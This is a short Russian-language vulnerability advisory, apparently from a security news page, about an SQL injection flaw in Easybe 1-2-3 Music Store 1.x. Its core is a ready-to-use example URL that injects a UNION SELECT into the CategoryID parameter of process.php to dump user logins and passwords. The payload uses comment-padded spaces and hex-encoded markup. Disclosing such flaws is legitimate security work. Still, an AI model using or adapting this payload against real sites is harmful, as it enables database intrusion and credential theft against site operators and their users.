Программа: Easybe 1-2-3 Music Store 1.x

Уязвимость позволяет удаленному
пользователю выполнить произвольные SQL
команды в базе данных приложения.

Пример:

http://www.site.com/123music-path/process.php?pname=
ShowAlbumProcess-Start&CategoryID=1/**/and/**/1= 2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C
666F6E7420636F6C6F723D7265643E,login,0x3a, passwd,0x3C2F666F6E743E)/**/from/**/user/*



Оставить мнение